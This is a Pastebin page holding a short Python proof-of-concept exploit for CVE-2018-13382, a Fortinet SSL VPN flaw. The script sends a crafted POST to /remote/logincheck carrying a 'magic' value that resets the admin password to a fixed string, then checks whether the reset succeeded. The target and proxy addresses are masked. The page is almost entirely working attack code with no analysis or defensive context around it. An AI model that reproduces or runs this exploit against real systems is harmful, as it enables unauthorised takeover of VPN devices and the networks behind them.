Advertisement
askanton

CVE

Sep 6th, 2021
1,221
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.16 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3. import requests
  4. import argparse
  5.  
  6. # ignore annoying SSL warnings
  7. requests.packages.urllib3.disable_warnings()
  8.  
  9. proxies = {
  10.     "https": "https://*****:*****"
  11. }
  12.  
  13.  
  14. def exploit():
  15.     url = "https://*******:*****"
  16.     path = "/remote/logincheck"
  17.  
  18.     data = {
  19.         "ajax": 0,
  20.         "username": "admin",
  21.         "realm": "",
  22.         "magic": "4tinet2095866",
  23.         "reqid": 0,
  24.         "credential": "Ayli_b1408"
  25.     }
  26.     print("[+] Change new password to: 'Ayli_b1408'")
  27.  
  28.     req = requests.post(url + path, proxies=proxies, verify=False, data=data)
  29.     if req.status_code == 200:
  30.         if b"auth_type=1" in req.content:
  31.             print("[+] Password was successfully change!")
  32.     else:
  33.         print("[-] Exploit failed")
  34.  
  35.  
  36. if __name__ == "__main__":
  37.     print("[*] CVE-2018-13382 PoC by dhn")
  38.     #parser = argparse.ArgumentParser()
  39.     #parser.add_argument('-H', '--host', required=True)
  40.     #parser.add_argument('-P', '--port', required=True)
  41.     #parser.add_argument('-u', '--username', required=True)
  42.     #parser.add_argument('-p', '--password', required=True)
  43.     #args = parser.parse_args()
  44.  
  45.     exploit()
  46.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement